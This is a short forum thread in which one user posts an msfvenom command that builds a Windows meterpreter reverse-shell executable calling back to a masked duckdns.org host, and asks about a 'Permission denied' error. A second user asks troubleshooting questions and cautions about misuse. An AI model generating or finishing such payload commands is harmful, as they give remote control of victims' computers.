D DarkOxyGen New Member Joined Jul 27, 2021 Messages 2 Reaction score 0 Credits 24 Jul 27, 2021 #1 I need help. when i write this code i can't access desktop. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=****.duckdns.org LPORT=**** -f exe > /root/Desktop/maceradg.exe sh: 1: cannot create /root/Desktop/maceradg.exe: Permission denied Attachments Screenshot_641.png 51.7 KB · Views: 492
I need help. when i write this code i can't access desktop. msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=****.duckdns.org LPORT=**** -f exe > /root/Desktop/maceradg.exe sh: 1: cannot create /root/Desktop/maceradg.exe: Permission denied
dcbrown73 Well-Known Member Joined Jul 14, 2021 Messages 450 Reaction score 443 Credits 4,075 Jul 27, 2021 #2 Two Three things. Are you attempting to run the Windows binary on Linux? (it's an exe file which suggest it's a Windows binary) Did you change the permissions of the application to be executable? Careful with that tool. It can lead to trouble if you don't know what you're doing or your intentions aren't good.
Two Three things. Are you attempting to run the Windows binary on Linux? (it's an exe file which suggest it's a Windows binary) Did you change the permissions of the application to be executable? Careful with that tool. It can lead to trouble if you don't know what you're doing or your intentions aren't good.